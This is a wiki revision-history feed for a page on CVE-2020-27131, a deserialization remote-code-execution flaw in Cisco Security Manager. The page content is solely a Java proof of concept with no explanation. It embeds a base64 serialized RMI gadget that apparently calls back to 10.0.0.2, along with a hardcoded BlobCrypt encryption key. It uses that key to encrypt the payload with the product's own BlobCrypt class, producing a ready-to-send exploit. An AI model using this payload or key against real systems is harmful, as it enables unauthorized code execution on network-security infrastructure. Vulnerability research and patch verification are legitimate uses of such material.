https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-27131_Cisco_Security_Manager_%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E
CVE-2020-27131 Cisco Security Manager 反序列化RCE漏洞 - Revision history
2026-04-09T22:09:15Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-27131_Cisco_Security_Manager_%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E&diff=1902&oldid=prev
Pwnwiki: Created page with "==POC== <pre> import java.security.InvalidKeyException; import java.util.Base64; import com.cisco.nm.cmf.security.jaas.BlobCrypt; public class JaasEncryptor { public..."
2021-04-27T07:00:00Z
<p>Created page with "==POC== <pre> import java.security.InvalidKeyException; import java.util.Base64; import com.cisco.nm.cmf.security.jaas.BlobCrypt; public class JaasEncryptor { public..."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
import java.security.InvalidKeyException;<br />
import java.util.Base64;<br />
import com.cisco.nm.cmf.security.jaas.BlobCrypt;<br />
<br />
public class JaasEncryptor {<br />
<br />
public static void main(String args[]) {<br />
String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";<br />
<br />
byte[] payload = Base64.getDecoder().decode(b64Payload);<br />
byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};<br />
<br />
byte[] enc = BlobCrypt.encryptArray(payload, key);<br />
System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));<br />
byte[] dec = BlobCrypt.decryptArray(enc, key);<br />
}<br />
}<br />
</pre></div>
Pwnwiki